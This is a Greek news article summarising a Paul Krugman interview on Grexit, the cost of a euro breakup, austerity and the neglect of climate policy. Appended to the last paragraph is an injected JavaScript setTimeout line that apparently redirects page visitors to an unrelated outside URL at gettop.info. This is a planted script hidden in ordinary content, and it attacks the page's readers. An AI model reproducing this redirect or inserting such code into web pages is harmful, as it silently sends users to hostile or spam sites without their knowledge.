Κρούγκμαν: Η Ελλάδα θα έπρεπε να είχε εγκαταλείψει το ευρώ

0
8

 

Επιμένει στην άποψή του ότι θα έπρεπε να είχε γίνει Grexit, ο Αμερικανός οικονομολόγος και Νομπελίστας Πολ Κρούγκμαν, σε συνέντευξή του στην αυστριακή «Der Standard», σημειώνοντας πως αυτήν τη στιγμή δεν θα υποστήριζε μία κατάργηση του ευρώ, ακόμη και αν μπορεί να αντιληφθεί γιατί το κάνουν κάποιοι άλλοι.

Το κόστος για μία διάλυση ολόκληρης της Νομισματικής Ένωσης θα ήταν πολύ υψηλό, προσθέτει ο Κρούγκαν ο οποίος επισημαίνει πως αξίζει ακόμη να ξεκινήσει μία τελευταία προσπάθεια διάσωσης για να επιδιορθωθεί το σύστημα.

Ερωτώμενος τι θα γίνει εάν συνεχίζεται να ασκείται «γερμανική» οικονομική πολιτική, δηλαδή λιτότητα αντί επενδύσεων, ο Νομπελίστας οικονομολόγος απαντά πως «τότε θα έχουμε ένα πρόβλημα», ενώ σε ερώτηση ποιο είναι εκείνο το θέμα, το οποίο τυγχάνει μικρής προσοχής από τα μέσα ενημέρωσης και την πολιτική, επισημαίνει ότι πρέπει να γίνει περισσότερη συζήτηση για το κλίμα.

Κατά την άποψή του, το κλίμα θα μπορούσε να είναι, επίσης, μία λύση για τα οικονομικο-πολιτικά προβλήματα, μία ενεργός πολιτική για το κλίμα θα αποτελούσε μία οικονομική «διέγερση» για τα επόμενα πέντε έως δέκα χρόνια.

Μάλιστα, χαρακτηρίζει «εκπληκτικό» το πόσο περιορισμένη είναι η σχετική συζήτηση, όταν γίνεται προφανέστατο ότι κάποιος οδηγείται στην καταστροφή. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here